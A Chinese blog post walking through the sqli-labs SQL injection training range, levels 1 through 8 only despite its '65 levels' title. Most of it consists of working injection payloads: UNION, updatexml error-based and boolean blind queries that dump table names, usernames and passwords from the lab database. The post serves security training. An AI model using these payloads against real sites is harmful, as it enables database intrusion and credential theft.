Sqli_labs65关通关详解

已于 2023-11-19 18:45:25 修改
阅读量323 收藏
点赞数
文章标签: oracle python 开发语言 测试工具 模块测试 功能测试
于 2023-10-10 22:56:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45281236/article/details/133644631
版权

Sqli_labs65关通关详解

Less-1

尝试单引号、双引号、字符型注入
在这里插入图片描述
单引号发现直接屏蔽,报错
在这里插入图片描述

输入:http://192.168.11.130:86/Less-1/?id=-1' or '1'='1

在这里插入图片描述
是正常回显的,可以通过单引号闭合进行注入

http://192.168.11.130:86/Less-1/?id=-1' order by 3 %23,正常回显

在这里插入图片描述

http://192.168.11.130:86/Less-1/?id=1' order by 4 %23,报错

在这里插入图片描述
可以看出总共有三列,结合union查询
在这里插入图片描述
查看数据库

http://192.168.11.130:86/Less-1/?id=-1' union select 1,database(),3 %23

在这里插入图片描述
查看数据库下的表名

http://192.168.11.130:86/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

在这里插入图片描述

http://192.168.11.130:86/Less-1/?id=-1' union select 1, group_concat(column_name) ,3 from information_schema.columns where table_name='users'--+

在这里插入图片描述
查username和password的值

http://192.168.11.130:86/Less-1/?id=-1' union select 1, group_concat(username),group_concat(password) from security.users

在这里插入图片描述

Less-2

数字型注入,不需要去闭合

http://192.168.11.130:86/Less-2/?id=-1%20union%20select%201,database(),3

在这里插入图片描述
查看数据库下的表名

http://192.168.11.130:86/Less-2/?id=-1 union select 1, group_concat(table_name),3 from%20information_schema.tables where table_schema='security'

在这里插入图片描述
查users表下的所有字段

http://192.168.11.130:86/Less-2/?id=-1 union select 1, group_concat(column_name) ,3 from information_schema.columns where table_name='users'--+

在这里插入图片描述
查username和password的值

http://192.168.11.130:86/Less-2/?id=-1 union select 1, group_concat(username),group_concat(password) from security.users

在这里插入图片描述

Less-3

http://192.168.11.130:86/Less-3/?id=1',报错

在这里插入图片描述

根据报错回显中可以知道需要去闭合()。

http://192.168.11.130:86/Less-3/?id=-1') union select 1,database(),3 %23

在这里插入图片描述
根据1,2的思路去爆破表名及对应表中的字段及相应的值

Less-4

尝试'和')都是正常回显

http://192.168.11.130:86/Less-4/?id=1')

在这里插入图片描述
尝试"号,报错
在这里插入图片描述

http://192.168.11.130:86/Less-4/?id=1" %23,也是报错

在这里插入图片描述

尝试双引号闭合:
http://192.168.11.130:86/Less-4/?id=1")%23

在这里插入图片描述

构造语句
http://192.168.11.130:86/Less-4/?id=1") union select 1,database(),3 %23

在这里插入图片描述
根据1,2的思路去爆破表名及对应表中的字段及相应的值

Less-5

http://192.168.11.130:86/Less-5/?id=1"

无任何报错或其他信息
在这里插入图片描述
通过报错注入发现有错误提示

http://192.168.11.130:86/Less-5/?id=1' and 1=3

在这里插入图片描述

http://192.168.11.130:86/Less-5/?id=1'and 1=(updatexml(1,concat(0x3a,(select database())),1))%23

在这里插入图片描述
查看数据库下的表名

http://192.168.11.130:86/Less-5/?id=1'and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1))%23

在这里插入图片描述
查users表下的所有字段

http://192.168.11.130:86/Less-5/?id=1'and 1=(updatexml(1,concat(0x3a,(select  group_concat(column_name)  from information_schema.columns where table_name='users')),1))%23

在这里插入图片描述
查看username和password的值

http://192.168.11.130:86/Less-5/?id=1'and 1=(updatexml(1,concat(0x3a,(select  group_concat(username,password) from security.users)),1))%23

在这里插入图片描述

Less-6

http://192.168.11.130:86/Less-6/?id=1"报错,可以判断是双引号
在这里插入图片描述
改为双引号闭合即可。

http://192.168.11.130:86/Less-6/?id=1 and 1=(updatexml(1,concat(0x3a,(select database())),1))%23

在这里插入图片描述
查看数据库下的表名

http://192.168.11.130:86/Less-6/?id=1" and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1))%23

在这里插入图片描述
查users表下的所有字段

http://192.168.11.130:86/Less-6/?id=1"  and 1=(updatexml(1,concat(0x3a,(select  group_concat(column_name)  from information_schema.columns where table_name='users')),1))%23

在这里插入图片描述

Less-7

输入id=1,页面未报错
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1',显示报错,但是没有报错信息

在这里插入图片描述
输入id=1"时显示正常所以我们可以断定参数id时单引号字符串
在这里插入图片描述
输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错
在这里插入图片描述
在这里插入图片描述
尝试双括号id=1'))--+,发现页面显示正常
在这里插入图片描述
尝试布尔盲注即可

http://192.168.11.130:86/Less-7/?id=1' and length((select database()))>6))--+

在这里插入图片描述
在这里插入图片描述
说明database的长度为8
爆破database数据库名

http://192.168.11.130:86/Less-7/?id=1'and ascii(substr((select database()),1,1))=115))--+

#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13))--+

判断所有表名字符长度
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99))--+

逐一判断表名
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19))--+

判断所有字段名的长度
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99))--+

逐一判断字段名
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1' and length((select group_concat(username,password) from users))>109))--+

判断字段内容长度
在这里插入图片描述

http://192.168.11.130:86/Less-7/?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50))--+

逐一检测内容
在这里插入图片描述

Less-8

输入:?id=1,页面正常显示
http://192.168.11.130:86/Less-8/?id=1

在这里插入图片描述

输入:?id=1',发现并没有报错,而是没有正常显示

在这里插入图片描述

使用id=1''和id=1'--+,正常显示

在这里插入图片描述
根据正确和错误的回显不同,可以使用布尔盲注
1.猜解数据库名长度

id=1' and length(database())>4--+ #正常回显
id=1' and length(database())>6--+ #正常回显
id=1' and length(database())>8--+ #正常回显
......
id=1' and length(database())=8--+ #正常回显

在这里插入图片描述
在这里插入图片描述
这里没回显
在这里插入图片描述
尝试id=1’ and length(database())=8–+ #正常回显,说明数据库名长度为8
在这里插入图片描述
2.猜解数据库名
使用二分法查找,小于110时不存在,小于120时存在,然后依次查找当猜到115时正常

id=1' and ascii(substr(database(),1,1))<110--+
id=1' and ascii(substr(database(),1,1))<120--+
......
id=1' and ascii(substr(database(),1,1))=115--+

在这里插入图片描述
在这里插入图片描述
等于115时显示正常,说明第一个字母为’s’
在这里插入图片描述
以此类推第二个、三个…到第八个字母,最终为’security’

id=1' and ascii(substr(database(),1,1))=115--+
id=1' and ascii(substr(database(),1,2))=101--+
id=1' and ascii(substr(database(),1,3))=99--+
id=1' and ascii(substr(database(),1,4))=114--+
id=1' and ascii(substr(database(),1,5))=117--+
id=1' and ascii(substr(database(),1,6))=105--+
id=1' and ascii(substr(database(),1,7))=116--+
id=1' and ascii(substr(database(),1,8))=121--+

3.猜解表名

判断第一个表名的长度

id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1--+ #没有回显
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2--+ #没有回显
......
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6--+ #正常回显

在这里插入图片描述
判断第二个表名的长度

id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,2),1))=1--+ #没有回显
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,2),1))=2--+ #没有回显
......
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=8--+ #正常回显

在这里插入图片描述
以此类推
判断第三个表名的长度

id=1' and length(substr((select table_name from information_schema.tables where table_schema="security" limit 2,1),1))=7--+

在这里插入图片描述
判断第四个表名的长度

id=1' and length(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1))=5--+

在这里插入图片描述
4.猜解表名
根据之前二分法,得知表名为第一个值为101对应的为’e’,以此类推

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=109--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=97--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=105--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=108--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=115--+

在这里插入图片描述
以此类推,最后表名为’users’,是我们想要的数据

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))=117--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),2,1))=115--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),3,1))=101--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),4,1))=114--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),5,1))=115--+

在这里插入图片描述
在这里插入图片描述
5.猜解字段
第一个列名第一个字母为‘i’,第一个列名第二个字母为‘d’

?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security'  limit 0,1),1,1)))=105--+
?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security'  limit 0,1),2,1)))=100--+

在这里插入图片描述
第二列名第一个字母为‘u’

?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security'  limit 1,1),1,1)))=117--+
?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security' limit 1,1),2,1)))=115--+
.......

在这里插入图片描述
在这里插入图片描述
以此类推,第二个列明为username
第三列名第一个字母为‘p’

?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security'  limit 2,1),1,1)))=112--+
?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema = 'security' limit 2,1),2,1)))=97--+
.......

在这里插入图片描述
以此类推,第三个列明为password

6.获取表中的数据
6.1获取条数

?id=1' and  (select count(*) from users)=13 --+

表里为13条
在这里插入图片描述
6.2判断数据长度

?id=1'   and  length((select id from users limit 0,1))=1 --+

在这里插入图片描述

6.3判断第一个长度

?id=1'   and  length((select username from users limit 0,1))=4 --+

在这里插入图片描述
可见username的长度为4,第二个长度为8
在这里插入图片描述

?id=1'  and length((select password from users limit 0,1))=4 --+
?id=1'  and length((select password from users limit 1,1))=10 --+

在这里插入图片描述
在这里插入图片描述
6.4判断数据

?id=1'   and ascii(substr((select username from users limit 0,1),1,1))=68 --+,对应D
?id=1'   and ascii(substr((select username from users limit 0,1),2,1))=117 --+,对应u

在这里插入图片描述
在这里插入图片描述

?id=1'   and ascii(substr((select password from users limit 0,1),1,1))=68 --+,对应D
?id=1'   and ascii(substr((select password from users limit 0,1),2,1))=117 --+,对应u

在这里插入图片描述
在这里插入图片描述
以此类推
然后就这样依次进行得到username:Dumb,password:Dumb

weixin_45281236
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1165
【代码】SQL注入-SQLi-LABS靶场1-65完整payload。
Sqli-labs 1-65的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3576
Sqli-labs的详细解题记录 Less-1: 进入卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
sql-labs(1-8
最新发布
2302_80935968的博客
04-17 2126
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
基于Sqli-Labs靶场的SQL注入-54~65
Joker
01-12 481
主要讲最后几通关方法。
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析 详细,超级详细
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs-master.zip
03-17
靶场的搭建过程相对简单,只需将下载的“sqli-labs-master.zip”文件解压,按照官方文档或者网络上的教程进行配置,就可以在个人虚拟环境中运行。这一步对于理解Web应用的运行环境和服务器配置也是很有帮助的。 在...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs闯记录(1~65)
qq_62540010的博客
01-04 3625
sql漏洞闯记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,其实就是恶意用户通过在可提交给数据库的地方写入恶意代码,将数据库的数据提取出来。. 2.工具 在1~15,我们要用到hacbar,burpsuit,中国蚁剑,并且我用的是phpstudy2018来配置的Apache和mysql. 3.less 1,2,3,4 之所以把1234一起破解,是因为它们属于同一类型,下面我们来看一看他们的不同
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1589
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQLi-Labs1~65通关攻略
Clannad的博客
10-30 8711
文章目录1~10Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-1011~20Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-2021~30Less-21Less-22Less-23Less-24Less-25Less-26Less-27Le...
sqli-labs 1-65 详细分析
qq_43009954的博客
09-04 1749
这是sqli-labs靶场的通关讲解,希望能帮到你
Sqli-labs 1-65通关整理(含做不出)
qq_45837896的博客
11-15 247
移步博客 Sqli-labs1-65通关
SQL注入:sqli-labs靶场通关(1-37
qq_68163788的博客
02-03 5126
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqlilabs学习笔记1-65
xiaoguaishou_2的博客
03-22 1232
sqlilabs笔记
sqli_labs安装
04-13
sqli_labs是一个用于学习和实践SQL注入的实验环境。下面是sqli_labs的安装步骤: 1. 首先,你需要在你的机器上安装一个Web服务器,比如Apache或Nginx,并确保它正常运行。 2. 下载sqli_labs的源代码。你可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值